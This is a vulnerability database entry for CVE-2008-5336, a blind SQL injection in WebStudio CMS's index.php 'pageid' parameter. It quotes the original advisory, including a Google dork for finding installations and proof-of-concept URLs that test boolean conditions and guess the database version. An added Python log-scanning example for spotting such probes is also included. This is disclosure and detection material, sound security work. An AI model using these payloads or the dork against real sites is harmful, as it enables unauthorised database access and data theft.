WebStudio CMS index.php SQL Injection Vulnerability

Vulnerability ID: 1116812
Vulnerability type: SQL injection
Published: 2008-11-24
Updated: 2008-12-04
CVE ID: CVE-2008-5336
CNNVD-ID: CNNVD-200812-060
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7216
https://www.securityfocus.com/bid/80784
https://cxsecurity.com/issue/WLB-2008120013
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200812-060
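|Vulnerability details
WebStudioCMS is a powerful, modular website content management system. An SQL injection vulnerability exists in index.php of WebStudioCMS. A remote attacker can execute arbitrary SQL commands via the pageid parameter.
|Exploit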
Application:  WebStudio CMS
Vendor Name: BDigital Media Ltd
Vendors Url:  http://www.bdigital.biz
Bug Type:     WebStudio CMS (pageid) Blind SQL Injection Vulnerability
Exploitation: Remote
Severity: Critical
Solution Status: Unpatched
Introduction: WebStudio CMS is a modular Web Content Management System
solution.
Google Dork:  "Powered by WebStudio"

Description:

WebStudio CMS is prone to an SQL-injection vulnerability because it fails to
sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application,
access or modify data, or exploit latent vulnerabilities in the underlying
database.

PoC:

http://localhost/index.php?pageid=1+and+1=1 ( TRUE  )
http://localhost/index.php?pageid=1+and+1=2 ( FALSE )

Exploit:

http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=3 ( TRUE  )
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=4 ( FALSE )
http://localhost/index.php?pageid=1+and+substring(@@version,1,1)=5 ( FALSE )

Solution:

There was no vendor-supplied solution at the time of entry.

Edit source code manually to ensure user-supplied input is correctly
sanitised.

Credits:

Charalambous Glafkos
Email:  glafkos (at) astalavista (dot) com
___________________________________________
ASTALAVISTA - the hacking & security community
www.astalavista.com
www.astalavista.net

# milw0rm.com [2008-11-24]
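A defender-side check for the request pattern shown in the advisory above, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for index.php requests whose pageid value is not a plain integer and flags clients whose such requests returned differing response sizes. The Apache combined log format, the sample log lines, and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (an assumption;
# adjust REQUEST_RE if your server logs differently).
SAMPLE_LOG = """\
192.0.2.10 - - [24/Nov/2008:10:00:01 +0000] "GET /index.php?pageid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Nov/2008:10:00:05 +0000] "GET /index.php?pageid=1+and+1=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Nov/2008:10:00:06 +0000] "GET /index.php?pageid=1+and+1=2 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Nov/2008:10:00:09 +0000] "GET /index.php?pageid=1%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.0.2.10 - - [24/Nov/2008:10:01:00 +0000] "GET /index.php?pageid=42 HTTP/1.1" 200 4977 "-" "Mozilla/5.0"
192.0.2.33 - - [24/Nov/2008:10:02:00 +0000] "GET /about.php?pageid=x HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')
INTEGER_RE = re.compile(r'[0-9]{1,10}')  # what a legitimate pageid looks like


def suspicious_pageid_requests(log_text):
    """Return {client_ip: [(decoded pageid, status, bytes), ...]} for
    index.php requests whose pageid is not a plain integer."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/index.php"):
            continue
        # parse_qs decodes both '+' and %XX, so encoded probes are normalised.
        for value in parse_qs(url.query, keep_blank_values=True).get("pageid", []):
            if not INTEGER_RE.fullmatch(value):
                hits[ip].append((value, int(status), 0 if size == "-" else int(size)))
    return dict(hits)


def likely_boolean_probing(hits, min_requests=2):
    """Clients that sent several non-integer pageid values and got differing
    response sizes back, the TRUE/FALSE signal a blind injection relies on."""
    return sorted(ip for ip, rows in hits.items()
                  if len(rows) >= min_requests and len({r[2] for r in rows}) > 1)
```

The same integer-only rule used in `INTEGER_RE` is the input check the advisory's Solution section calls for on the server side.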
|Affected products
BDigital Web Solutions WebStudio CMS Nil
|References

Source: XF
Name: webstudiocms-index-sql-injection(46818)
Link: http://xforce.iss.net/xforce/xfdb/46818
Source: BID
Name: 32449
Link: http://www.securityfocus.com/bid/32449
Source: BUGTRAQ
Name: 20081124 WebStudio CMS 'pageid' Blind SQL Injection
Link: http://www.securityfocus.com/archive/1/archive/1/498597/100/0/threaded
Source: MILW0RM
Name: 7236
Link: http://www.milw0rm.com/exploits/7236
Source: MILW0RM
Name: 7216
Link: http://www.milw0rm.com/exploits/7216
Source: VUPEN
Name: ADV-2008-3273
Link: http://www.frsirt.com/english/advisories/2008/3273
Source: SREASON
Name: 4690
Link: http://securityreason.com/securityalert/4690